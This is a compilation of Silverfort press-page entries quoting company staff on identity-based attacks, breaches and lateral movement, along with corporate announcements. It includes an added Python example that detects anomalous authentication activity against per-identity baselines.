“Age-old vulnerabilities such as this provide a jumping-off point for attackers looking to move laterally to more sensitive areas by abusing the identity attack surface,” said Sharon Nachshony, security researcher at Silverfort. “With access to critical areas inside OT environments, their activities can quickly become significantly more impactful.”

“There is a long-standing supply chain risk to IoT and OT environments from legacy technology,” Nachshony said, which is why it’s critical to stay current with updates and fixes. “While hard to manage, given the abundance of such technology in critical industries, a rigorous patching regime is essential.”

Read the full story in Security Boulevard here.

---

- Published: 2022-12-06
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/cpo-magazine-a-decade-of-discussion-and-were-still-not-thinking-laterally/

Lateral movement has been a common factor in breaches for some time. As the effectiveness of perimeter defences has been gradually eroding, the main issue for attackers is no longer how to get into an organization – but how to move across the network to access their final target.

The typical environment has developed over time into a fragmented collection of technical resources – a variety of applications, servers, IT infrastructure, cloud workloads and more. While these resources are separate, they are all connected by identity and access management – the infrastructure governing access throughout.
This is what attackers use to move laterally. Starting at patient zero, they move from one machine to another by abusing identity until arriving at their target destination to drop ransomware, steal sensitive information and more.

Read the full article in CPO Magazine here.

---

- Published: 2022-12-05
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/computerweekly-lastpass-probes-new-cyber-incident-related-to-august-attack/

The August 2022 cyber attack on LastPass seems to have begat another incident, according to company CEO Karim Toubba

Credential management specialist LastPass has disclosed a new cyber security incident – its second in four months – that seems to have its roots in the first.

The company launched an investigation, notified law enforcement and brought on board expertise from Mandiant, after it spotted unusual activity in an undisclosed third-party cloud storage service, which it shares with its affiliate GoTo, a unified communications company.

LastPass CEO Karim Toubba said the investigation found that an unauthorised party used information stolen in the August 2022 incident to access “certain elements” of customers’ information. Customer passwords were not impacted and remain safely encrypted, he said.

Silverfort senior researcher Yoav Iellin commented: “Given the vast amount of passwords it protects globally, LastPass remains a big target.

“The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically, it is best practice after suffering a breach for the organisation to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused.

Iellin added: “For worried users, ensure you watch out for updates from the company and take time to verify that these are legitimate before taking any action.
“In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass, and changing passwords, will provide the utmost level of security.”

Read the full story in ComputerWeekly.com here.

---

- Published: 2022-12-01
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/forbes-new-lastpass-hack-confirmed-heres-what-we-know-so-far/

On Wednesday, 30 November, LastPass CEO, Karim Toubba, confirmed that an unauthorized party had gained access to "certain elements of our customers' information" within a third-party cloud storage service. The data breach was, Toubba stated, made possible using information obtained from a previous hacking incident in August this year. At that time, Toubba said that portions of source code and some proprietary LastPass technical information had been accessed. It is not clear, however, what specific information enabled the threat actor to gain access to the cloud storage service in the latest breach.

"Given the vast amount of passwords it protects globally, LastPass remains a big target," Yoav Iellin, a senior researcher at Silverfort, says. "The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically, it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused."

Read the full story in Forbes here.

---

- Published: 2022-11-17
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/security-magazine-iranian-apt-breaches-government-agency-using-log4shell/

Iranian government-sponsored advanced persistent threat (APT) actors breached the Federal Civilian Executive Branch (FCEB) and its network, according to a cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).

In the course of incident response activities, CISA determined that the APT actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence.

Yaron Kassner, CTO and Co-Founder of Silverfort, says, “The alert from CISA is evidence of the unfortunate legacy we were warned to expect from Log4Shell at the time of its discovery. It is a gift to state actors and access brokers, and this attack is proof of the impact critical vulnerabilities such as this can have when left unpatched. As we see here, once a toehold is gained — attackers are then able to simply pick up administrator credentials and use them to move laterally before eventually compromising the entire domain. This emphasizes the need for MFA inside the network, which was clearly missing here. Hopefully, crypto-mining was the sole outcome of this attack and not more than that.”

Read the full story in Security Magazine here.

---

- Published: 2022-11-03
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/acrisure-silverfort-partnership-announcement/

New partnership to help policyholders easily meet growing identity protection requirements

Thursday 3 November 2022, Boston, MA: Silverfort, a unified identity protection leader, today announced a partnership with Acrisure Cyber Services (ACS). ACS is a division of Acrisure, a global fintech that operates a top-10 global insurance broker that also provides cyber services, real estate services and asset and wealth management. Silverfort is known for helping organizations of all sizes meet an increasingly rigorous identity and access management compliance burden emerging in cyber insurance policies.
The increasing sophistication of cyber attacks continues to expose the IT infrastructures of organizations, which is driving up cyber insurance premiums. As a result, underwriters are increasingly mandating that Multi Factor Authentication (MFA) is applied with far greater depth than before to inhibit threat actors’ movements as they propagate attacks.

ACS will deliver Silverfort as part of its “Security as a Service” model, sitting alongside other technologies intended to provide companies of all sizes with full compliance to a range of carrier policies. Alongside Silverfort, this stack of technologies also covers endpoint security, vulnerability detection and management, backup and disaster recovery, security awareness training and email security.

Silverfort will help enable ACS clients to comply with requirements by seamlessly extending MFA to previously unprotectable resources. Organizations will be able to enforce MFA across all on-prem and cloud resources including on email, remote network access tools, network infrastructure, directories, servers, workstations and even on legacy protocols that allow ransomware attacks to spread. It will also allow customers to automatically discover, monitor and secure the automated Service Accounts commonly used in data breaches, without having to modify them.

Hed Kovetz, CEO and Co-Founder of Silverfort, said, “Driven by a rising volume of attacks propagating through unprotected technical resources, many policies now require far more comprehensive identity protection and access controls. While many may have MFA at a surface level - this no longer goes deep enough for underwriters, risking decreased coverage, being denied policies, or having claims rejected in the event of an incident. We address this gap. Partnering with Acrisure Cyber Services means we can help more companies become compliant with tightening industry standards and we look forward to working together.”

Acrisure Cyber Services President, Bill Meara, said, “Requirements in cybersecurity insurance policies are evolving as the industry continues to adapt to a fast-changing risk. Many carriers now mandate securing previously unprotectable areas with authentication and access controls, which is often difficult through traditional methods. The partnership with Silverfort helps companies of all sizes remain compliant in a simple and effective manner.”

More information on how Silverfort helps companies comply with emerging cybersecurity insurance standards can be found here. Further details on Acrisure Cyber Services can also be seen here.

---

- Published: 2022-10-21
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/spiceworks-how-can-organizations-prevent-lateral-movement-attacks-by-harnessing-risk-analysis-and-mfa/

In a world that has grown accustomed to the inevitability of initial compromise, lateral movement is becoming the new battleground. The perimeter has dissolved, and a new attack surface has been exposed.

Keshet, director of product marketing at Silverfort, looks at how risk analysis and MFA can help prevent lateral movement attacks. Starting at an initial toehold on a single machine – lateral movement is a critical phase for attackers looking to reach sensitive and vital systems. It allows them to hop from machine to machine, eventually positioning themselves for maximum impact.

So, what do cybercriminals do when they perform lateral movement attacks – and what can be done to defend against them? To read the full story, visit the Spiceworks website here.

---

- Published: 2022-09-22
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/press-washington-examiner-silverfort-comments-on-uber-hack/

On Sept. 19, the Uber hack was blamed on hacking group Lapsus$, which the company announced days earlier. Lapsus$ is an international hacking group known for attacking companies in the tech industry, including Microsoft, Cisco, Samsung, and Nvidia, in 2022 alone.

“The attacker accessed several internal systems, and our investigation has focused on determining whether there was any material impact,” Uber said in a statement. At the end of its last financial year, Uber had 118 million active regular users.

According to Silverfort's CTO and co-founder, Yaron Kassner, Lapsus$ has previously extorted the victims of its attacks and threatened to leak data if its demands weren't met. “Publishing such information also serves to bolster their credentials and show future victims their intentions are serious,” Kassner told the Washington Examiner.

While Uber has said that it has not seen a breach of customer data, it may be too early to tell, Kassner said. Whether or not customer information is involved is “something that will only be fully ascertained once an incident investigation is complete, which takes time,” Kassner said. “Given the high level of privileges obtained, it remains a possibility.”

To read the full story with Silverfort's commentary on the Uber hack, click here. For the key lessons we've learned from the Uber hack, check out our blog here.

---

- Published: 2022-09-13
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/press-help-net-security-tim-fleming-appointed-as-strategic-advisor/

Unified Identity Protection company Silverfort has appointed Tim Fleming as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over 20 years, as CIO of Australia and APAC, Tim oversaw a team of more than 1300 with direct accountability for countries including India, China, Taiwan and Japan.
“As someone with a very clear perspective on where identity fits into a wider picture of organizational risk, Tim is perfectly positioned to help us as we continue to scale,” said Hed Kovetz, CEO and Co-founder, Silverfort.

“My time at Deloitte taught me the importance of embracing emerging technologies to resolve business problems, something Silverfort is well-positioned to help achieve. Not only does the platform have immediate tactical benefits – extending MFA to legacy systems or protecting non-human identities, for example – but it can also consolidate visibility and security across the different identity platforms on-prem and in the cloud, to play a more strategic role,” said Tim Fleming, Strategic advisor, Silverfort. “Overall, Silverfort’s defensive capabilities against cyber threats such as Ransomware are, I believe, second to none,” Fleming continued.

To read the full story in Help Net Security, click here. To read the press release, click here.

---

- Published: 2022-09-11
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/ex-deloitte-cio-joins-silverfort-as-strategic-advisor/

Tim Fleming brings over 40 years’ risk management and innovation experience at large organizations to fast-scaling Unified Identity Security platform

12 September, Gartner IT Symposium/Xpo, Australia: Unified Identity Protection company Silverfort today announced the appointment of ex-Deloitte Australia and APAC CIO and Partner, Tim Fleming, as Strategic Advisor. Responsible for all commercial and operational technology strategy at Deloitte for over 20 years, as CIO of Australia and APAC Tim oversaw a team of more than 1300 with direct accountability for countries including India, China, Taiwan and Japan. During his tenure, the company embarked on a period of rapid technical change which contributed to a five-fold growth in revenues.
Previously Head of Global Transformation and Innovation – as well as a member of the Global Cyber Committee – Tim also has significant experience helping organizations embrace emerging technologies to mitigate business risks and meet regulatory and certification requirements.

Hed Kovetz, Co-Founder and CEO of Silverfort, said, “As someone with a very clear perspective on where identity fits into a wider picture of organizational risk, Tim is perfectly positioned to help us as we continue to scale.

“His on-the-ground experience will not only be invaluable as we grow our operations in APAC, but he also brings a unique understanding of the role identity can play in board-level conversations about risk. This will be critical as our platform continues to see adoption with some of the largest organizations in the world.”

Tim Fleming, Strategic Advisor at Silverfort, said “My time at Deloitte taught me the importance of embracing emerging technologies to resolve business problems, something Silverfort is well-positioned to help achieve. Not only does the platform have immediate tactical benefits – extending MFA to legacy systems or protecting non-human identities, for example – but it can also consolidate visibility and security across the different identity platforms on-prem and in the cloud, to play a more strategic role.

“Overall, Silverfort’s defensive capabilities against cyber threats such as Ransomware are, I believe, second to none.”

Tim will be with the Silverfort APAC team located on stand 417 at the Gartner IT Symposium/Xpo. More information can be found at silverfort.com

About Silverfort

Silverfort is the leader in Identity Threat Protection, enabling secure authentication and access in a unified manner across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks including account takeover and ransomware propagation.
Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure, without requiring modifications to endpoints, servers or applications – a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access and more. Its platform enables Identity Threat Detection and Response (ITDR), agentless Multi-Factor Authentication (MFA), discovery and protection of service accounts (non-human identities), and adaptive Zero Trust security policies. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. It has been named a Gartner ‘Cool Vendor’ and received dozens of other industry awards. See a demo to learn more.

About Gartner IT Symposium/Xpo 2022

Gartner IT Symposium/Xpo 2022 is the world's most important gathering for CIOs and other IT executives. IT executives rely on these conferences to gain insight into how their organizations can use IT to overcome business challenges and improve operational efficiency. For more information, please visit www.gartner.com/au/symposium.

---

- Published: 2022-08-30
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/technology-mag-how-can-organisations-ensure-cyber-resilience/

Yaron Kassner, Co-Founder and CTO of Silverfort, spoke to Technology magazine about how businesses can develop cyber resilience.

Keeping up with the latest attack patterns from malware groups has always been a top security priority. But while it is essential to understand how cyber criminals gain initial access, it has become increasingly important to focus on what happens after this - understanding how they move from one machine to another. Technology Magazine asked Yaron how ransomware attackers use lateral movement to attack an organisation and what can be done to ensure cyber resilience.
How can any organisation strengthen their cyber resilience against lateral movement attacks?

Lateral movement used to be the preserve of highly resourced attack groups but, as with anything in cybersecurity, has become commoditized. First, organisations need to realise this and build lateral movement prevention into wider risk reduction strategies.

Next, they need visibility of such attacks. Until now, this has been a challenging task because spotting malicious access requests has been difficult. However, it is now possible to apply risk-based analysis to identity data to spot the anomalies which are a marker of threat actors. This ultimately means understanding what constitutes a ‘normal’ baseline for identity, and then monitoring for things like abnormal volumes and types of requests.

Most importantly, they can apply proactive rules and policies to act as gatekeepers around sensitive resources. This can come in the form of an MFA request designed to ensure that only the right person is allowed to access the asset in question.

To read the full article, click here.

---

- Published: 2022-08-09
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/security-mag-hashed-passwords-exposed-in-slack-vulnerability/

Office communication platform Slack has admitted to accidentally exposing the hashed passwords of some users. According to Wired, the vulnerability which exposed cryptographically scrambled versions of some users' passwords goes back five years, between April 17, 2017 and July 17, 2022 and impacted anyone who created or revoked a shared invite link. The workspace application began sending password reset links to affected users on August 4, a few days after an independent security researcher disclosed the vulnerability to Slack on July 17. Slack said the flaw impacted about 0.5 percent of its users, which could mean approximately 50,000 users, as the company said it had over 10 million daily active users in 2019.
Sharon Nachshony, Security Researcher at Silverfort, explains, “Hashes of salted passwords being leaked is not as dangerous as exposing them in plain-text, as an attacker would have to use brute-force methods — essentially automating a script to guess passwords — which takes some time.” While this makes exploitation less likely, Nachshony says “a threat actor may still be motivated to do this because Slack is used by so many companies. Incidents like these are once again a clear argument for users to enable MFA. If implemented correctly, this would alert the legitimate user to any authentication attempt on their behalf, denying any malicious access attempt.”

To read the full article in Security Magazine, click here.

---
- Published: 2022-05-11
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-21-calcalist-list-50-most-promising-israeli-startups/

The field of identity verification in the cyber world is full of competition on the one hand, and saturated with threats on the other. One of the most prominent companies in this market is the Israeli company Silverfort, which this year managed to raise $65 million from a number of prominent VC funds. The founders of the company, graduates of the IDF’s prestigious 8200 intelligence unit, understood that the world of identities needed a responsible adult who knew how to manage them all. Silverfort's patented technology enforces protection on the customer's existing infrastructure, as a uniform layer of security over all existing identification systems, without requiring changes to existing systems or installing software on them.

For the full article, click here.
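The risk-based approach the Technology Magazine interview above describes (learn a ‘normal’ baseline per identity, then monitor for abnormal volumes and types of requests) as an added Python example. This is not Silverfort’s code and does not represent its risk engine: the log format, the identities, hosts and protocols, and the volume threshold are all constructed for the example, and the only signals it uses are the three the interview names, authentication volume, destination hosts and request type.

```python
"""Baseline-then-deviation detection for authentication activity.

Added example (not Silverfort's code).  Learns, per identity, what a normal
day looks like (how many authentications, to which hosts, over which
protocols) from a learning window, then flags a review day that departs
from it.  Log format, names and thresholds are constructed for the example.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from statistics import mean, pstdev

# Constructed sample log: one authentication per line, key=value fields.
# Days 1-3 form the learning window.
BASELINE_LOG = """\
day=1 user=alice src=WS-ALICE dst=FILESRV01 proto=kerberos
day=1 user=alice src=WS-ALICE dst=MAIL01 proto=kerberos
day=1 user=bob src=WS-BOB dst=FILESRV01 proto=kerberos
day=2 user=alice src=WS-ALICE dst=FILESRV01 proto=kerberos
day=2 user=alice src=WS-ALICE dst=MAIL01 proto=kerberos
day=2 user=bob src=WS-BOB dst=FILESRV01 proto=kerberos
day=3 user=alice src=WS-ALICE dst=FILESRV01 proto=kerberos
day=3 user=alice src=WS-ALICE dst=MAIL01 proto=kerberos
day=3 user=bob src=WS-BOB dst=MAIL01 proto=kerberos
"""

# Constructed review day: bob's workstation suddenly authenticates to many
# hosts it never touched before, over a protocol bob never used, and an
# identity with no learning history appears.
REVIEW_LOG = """\
day=4 user=alice src=WS-ALICE dst=FILESRV01 proto=kerberos
day=4 user=alice src=WS-ALICE dst=MAIL01 proto=kerberos
day=4 user=bob src=WS-BOB dst=FILESRV01 proto=kerberos
day=4 user=bob src=WS-BOB dst=DC01 proto=ntlm
day=4 user=bob src=WS-BOB dst=SQL01 proto=ntlm
day=4 user=bob src=WS-BOB dst=WS-ALICE proto=ntlm
day=4 user=bob src=WS-BOB dst=BACKUP01 proto=ntlm
day=4 user=bob src=WS-BOB dst=HR-APP01 proto=ntlm
day=4 user=svc-backup src=BACKUP01 dst=DC01 proto=ntlm
"""


def parse(log: str) -> list[dict]:
    """Turn key=value log lines into dicts; blank lines are skipped."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split())
        fields["day"] = int(fields["day"])
        events.append(fields)
    return events


@dataclass
class Baseline:
    daily_counts: list[int]           # authentications per learning day
    hosts: set[str] = field(default_factory=set)
    protos: set[str] = field(default_factory=set)


def build_baseline(events: list[dict]) -> dict[str, Baseline]:
    """Per identity: daily volumes (zero days included) and hosts/protocols seen."""
    days = sorted({e["day"] for e in events})
    counts: dict[str, dict[int, int]] = defaultdict(lambda: defaultdict(int))
    hosts: dict[str, set[str]] = defaultdict(set)
    protos: dict[str, set[str]] = defaultdict(set)
    for e in events:
        counts[e["user"]][e["day"]] += 1
        hosts[e["user"]].add(e["dst"])
        protos[e["user"]].add(e["proto"])
    return {
        user: Baseline([counts[user].get(d, 0) for d in days], hosts[user], protos[user])
        for user in counts
    }


def detect(baseline: dict[str, Baseline], review: list[dict],
           volume_ratio: float = 3.0) -> list[tuple[str, str]]:
    """Return (identity, reason) findings for the review-day events."""
    findings = []
    per_user: dict[str, list[dict]] = defaultdict(list)
    for e in review:
        per_user[e["user"]].append(e)
    for user, evs in per_user.items():
        b = baseline.get(user)
        if b is None:
            findings.append((user, "no baseline for identity"))
            continue
        expected = max(float(mean(b.daily_counts)), 1.0)
        # The day must exceed both a multiple of the mean and mean + 3 sigma,
        # so a quiet identity that merely doubles once is not reported.
        threshold = max(expected * volume_ratio, expected + 3 * pstdev(b.daily_counts))
        if len(evs) > threshold:
            findings.append((user, f"volume {len(evs)} exceeds baseline {expected:.1f}"))
        new_hosts = sorted({e["dst"] for e in evs} - b.hosts)
        if new_hosts:
            findings.append((user, "new destinations: " + ",".join(new_hosts)))
        new_protos = sorted({e["proto"] for e in evs} - b.protos)
        if new_protos:
            findings.append((user, "new protocols: " + ",".join(new_protos)))
    return findings


def review_day() -> list[tuple[str, str]]:
    """Run the constructed sample end to end."""
    return detect(build_baseline(parse(BASELINE_LOG)), parse(REVIEW_LOG))


if __name__ == "__main__":
    for user, reason in review_day():
        print(f"{user}: {reason}")
```

Each finding is one reason a gatekeeping policy (the step-up MFA the interview mentions) could key on; a real deployment would learn the baseline over weeks rather than three days and treat a never-seen identity as a finding in its own right, as the example does for `svc-backup`.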
---
- Published: 2022-04-11
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-raises-65m-series-c-worlds-first-unified-identity-threat-protection-platform/

Led by Greenfield Partners and strategic investors such as General Motors, the new funding will further accelerate the company’s growth to deliver holistic identity security

BOSTON & TEL AVIV, April 12, 2022 – Silverfort, provider of the world’s first Unified Identity Threat Protection platform, has closed $65m in Series C funding led by Greenfield Partners, alongside several VCs and strategic investors, including GM Ventures, Acrew Capital, Vintage Investment Partners and existing investors StageOne Ventures, Singtel Innov8, Citi Ventures, Aspect Ventures and Maor Investments. The new investment, which brings Silverfort’s total funding to over $100m, follows rapid growth which saw Annual Recurring Revenue triple with hundreds of customers - including Fortune 100 companies. The funding will be used to scale the business and team globally and continue to expand the platform’s unique technological advantage.

“The company has spent years building a best-in-class platform to solve holistically a growing security problem now gaining mainstream awareness,” said Avery Schwartz, Partner at Greenfield Partners who will join the company’s board of directors. “We are energized both by the positive impact the company's technology is having and by the leadership's vision and passion. It is clear to us that Silverfort's strong momentum in the market is just the start, and we are excited to join them on this journey.”

Silverfort delivers Identity Threat Detection and Response (ITDR) and Identity Threat Prevention (ITP) capabilities as a unified layer on top of a customer’s existing Identity and Access Management (IAM) infrastructure, including both modern and legacy solutions, to stop identity-based attacks across the enterprise.
Silverfort’s patented technology achieves this in a way that doesn’t require modifications to the customer’s endpoints, servers or applications – a capability which is currently unmatched in the market. It also enables customers to extend security controls such as Multi-Factor Authentication (MFA) from any vendor to previously unsupported resources and environments, or even consolidate their hybrid IAM stack by ‘bridging’ legacy systems and protocols into modern identity platforms like Entra ID (formerly Azure AD).

“Identity security can no longer be a ‘feature’ that works in silos within each IAM platform, while leaving many sensitive resources out of scope,” said Hed Kovetz, Silverfort’s Co-Founder and CEO. “This lack of end-to-end identity threat protection has turned identity into today’s #1 attack surface, with compromised credentials being leveraged in 80% of all data breaches and ransomware campaigns. This problem required a new approach to identity security: a unified Zero Trust security layer that works on top of all modern and legacy IAM infrastructure, and covers all users, resources and environments.”

According to Gartner®, in the Top Trends in Cybersecurity 2022 report (February 2022), “Many IAM tools are operating in silos that are not visible to incident responders. Organizations must re-evaluate their IAM infrastructure with a goal of identifying opportunities for detecting compromise and immediately investigating and responding... This year, we are introducing a new term, ’identity threat detection and response’ (ITDR) to describe the collection of tools and best practices to successfully defend identity systems from endemic levels of attacks.”

“We are uniquely positioned to become the leader in ITDR and identity security in general, having spent years building and perfecting our unique platform for this exact purpose,” Kovetz added.
“Our agentless and proxyless technology consolidates detection, response and prevention across all IAM platforms - even in places where it was completely missing. Many of our customers have reported cases where the platform detected and stopped account takeover, lateral movement and ransomware propagation attempts. Our approach is already changing the identity security market and will gradually reshape it completely. The numbers speak for themselves: over 90% of those who trial our platform become customers, and we are adding a double-digit number of customers every month.”

Silverfort’s platform also enables customers to protect previously ‘unprotectable’ resources without requiring agents, proxies or application changes. This includes legacy systems, command-line interfaces, industrial OT systems (including air-gapped networks), IT infrastructure, service accounts (machine-to-machine access) and more.

“These previously unprotected assets are often viewed as the weakest link in enterprise security,” said Yaron Kassner, Silverfort’s Co-Founder and CTO. “By enabling secure authentication and access to these assets, Silverfort allows companies to close their deepest security gaps, and to comply with regulations and cyber insurance requirements.”

“The need for robust threat protection across the enterprise is more prevalent today than ever before, as traditional network parameters rapidly change and new threats emerge,” said Wade Sheffer, Managing Director, GM Ventures. “Our investment in Silverfort underscores GM Ventures’ commitment to identifying next generation technologies that will enhance a business’ digital enterprise while supporting GM’s transformation to a technology leader and platform innovator. We are optimistic about Silverfort’s growth and believe their technology has the potential to stop future identity-based threats at GM and beyond.”

More information can be found at www.silverfort.com

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

About Silverfort

Silverfort is the leader in Identity Threat Protection, enabling secure authentication and access in a unified manner across all corporate resources, both on-premises and in the cloud, to detect and stop identity-based attacks including account takeover and ransomware propagation. Using patented technology, Silverfort enforces its protection as a layer on top of the customer’s existing IAM infrastructure, without requiring modifications to endpoints, servers or applications – a capability which is unmatched in the market. This includes resources that couldn’t be protected before, such as legacy applications, command-line interfaces, industrial systems, machine-to-machine access and more. Its platform enables Identity Threat Detection and Response (ITDR), agentless Multi-Factor Authentication (MFA), discovery and protection of service accounts (non-human identities), and adaptive Zero Trust security policies. Silverfort is trusted by hundreds of enterprise customers around the world, including Fortune 100 companies. It has been named a Gartner ‘Cool Vendor’ and received dozens of other industry awards. See a demo to learn more.

About Greenfield Partners

Greenfield Partners is an investment firm focused on exceptional early growth stage technology businesses. With a dual presence in Tel Aviv and New York, the Greenfield team fuses deep local Israeli roots and an expansive global network to support entrepreneurs in their quest to build thriving technology companies. For more information, please visit http://greenfield-growth.com.

Media Contact: Kim Smith, Code Red Security PR, kim.smith@coderedsecuritypr.co.uk

---
- Published: 2021-11-01
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-appoints-drew-schuil-as-chief-revenue-officer/

BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)--Silverfort, the unified identity protection company, today announced the appointment of Drew Schuil as Chief Revenue Officer. Drew has 22 years of enterprise sales experience with leading security vendors including Integris Software (now OneTrust) and Imperva.

“Drew is a proven sales leader who has helped drive several early stage security vendors into market leadership positions,” said Hed Kovetz, CEO of Silverfort. “He possesses the right blend of management skills, technical expertise and security industry relationships to help Silverfort capitalize on our unique ability to unify siloed cloud and on-premises identity platforms with a Zero Trust approach.”

Drew joins Silverfort from Integris Software, a privacy and security startup that was acquired by OneTrust in 2020, where he was President and COO. He previously was VP Global Product Strategy at enterprise security vendor Imperva, where he served in several executive sales positions during his 11-year tenure.

“Silverfort is addressing one of the biggest challenges for companies that are migrating identity to the cloud and need to protect multiple IAM solutions across hybrid and multi-cloud environments with unified security controls,” said Drew Schuil. “The market opportunity for Silverfort is massive since virtually every organization must find a solution to this problem. I look forward to helping the company rapidly become a market leader in Identity Protection and Zero Trust.”

About Silverfort

Silverfort has created a Unified Identity Protection Platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks.
Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all existing IAM solutions extending their coverage to assets that cannot otherwise be protected including homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more. It continuously monitors all access by users and service accounts across both cloud and on-premise environments, analyzes risk in real-time using an AI-based engine, and enforces adaptive authentication and access policies. The company has been named a Gartner ‘Cool Vendor’, 451 Research ‘FireStarter’, CNBC ‘Upstart 100’, Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category and Most Promising Cybersecurity Startup of the Year by CDM Magazine. For more information, visit us at https://www.silverfort.com/ and follow us on LinkedIn and Twitter.

---
- Published: 2021-08-09
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-partners-with-idsa-to-build-awareness-for-identity-based-zero-trust/

Company will Work with the Identity Defined Security Alliance to Help Organizations Overcome Modern Authentication and Access Management Challenges

BOSTON and TEL AVIV, August 9, 2021 – Silverfort, the unified identity protection company, today announced it has joined the Identity Defined Security Alliance (IDSA), a nonprofit that provides vendor-neutral resources to help organizations reduce the risk of a breach by combining identity and security strategies. Silverfort will work with the IDSA on initiatives to inform organizations on the latest security threats and present best practices for implementing an identity-based Zero Trust framework across modern hybrid and multi-cloud infrastructures.

“Currently, organizations are managing identity across an array of silos including cloud-native systems and on-premise infrastructures like Active Directory.
This complexity increases security risk,” said Julie Smith, Executive Director of the IDSA. “We are pleased to have Silverfort join the IDSA and lead discussions on the need to consolidate and orchestrate identity management and threat detection across cloud, hybrid and multi-cloud infrastructures.”

“Implementing identity-based Zero Trust represents the best approach for preventing account takeovers, lateral movement and other attacks that utilize compromised credentials to access resources within enterprises’ on-premises and cloud environments,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “We look forward to working with the IDSA and its membership on initiatives to help organizations unify identity management and decrease risk across their entire attack surface.”

About the Identity Defined Security Alliance

The IDSA is a group of identity and security vendors, solution providers, and practitioners that acts as an independent source of thought leadership, expertise, and practical guidance on identity centric approaches to security for technology professionals. The IDSA is a nonprofit that facilitates community collaboration to help organizations reduce risk by providing education, best practices, and resources. For more information visit https://www.idsalliance.org/.

About Silverfort

Silverfort has created a Unified Identity Protection Platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all existing IAM solutions extending their coverage to assets that cannot otherwise be protected including homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more.
It's an ideal platform for unified access management as it continuously monitors all access by users and service accounts across both cloud and on-premise environments, analyzes risk in real-time using an AI-based engine, and enforces adaptive authentication and access policies. The company has been named a Gartner ‘Cool Vendor’, 451 Research ‘FireStarter’, CNBC ‘Upstart 100’, Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category and Most Promising Cybersecurity Startup of the Year by CDM Magazine. For more information, visit us at https://www.silverfort.com/ and follow us on LinkedIn and Twitter.

Media Contact: Marc Gendron, Marc Gendron PR for Silverfort, marc@mgpr.net, 617.877.7480

---
- Published: 2021-07-08
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-introduces-industry-first-prevention-against-pass-the-ticket-attacks/

Until Now, Forged Kerberos Sessions Could Only be Detected Retroactively

Boston and Tel Aviv, July 8, 2021 – Silverfort, the unified identity protection company, today released a new protection capability that enables organizations to proactively prevent lateral movement attacks that utilize the Pass the Ticket (PTT) technique. This Kerberos-based exploit could previously only be detected after an attack was carried out.

PTT is a post-exploitation method in which attackers compromise or create a valid Kerberos ticket and use it to authenticate to other endpoints and servers in the victim’s environment. It is especially difficult to detect and prevent because Active Directory cannot discern between legitimate and malicious Kerberos authentication tickets.

“Pass the Ticket attacks allow hackers to move laterally and undetected within the network because they appear to be performing ‘authorized’ access requests,” said Yaron Kassner, CTO of Silverfort.
“Since we have visibility into the full context of each user session, Silverfort is able to distinguish between legitimate and suspicious Kerberos authentication activity.”

Currently, security teams are unable to prevent PTT attacks as they occur and must instead rely on detecting anomalous authentication activity and retracing its origin. Silverfort has developed native integrations with identity directories, including Active Directory, that enable it to monitor, analyze the risk and enforce real time security controls on all access requests. In the case of PTT attacks, Silverfort’s AI-based risk engine will detect that the provided Kerberos ticket is malicious and not part of a legitimate authentication request. Based on the configured policy, Silverfort will instruct Active Directory to either block access or require multi-factor authentication to terminate the attack.

About Silverfort

Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter.

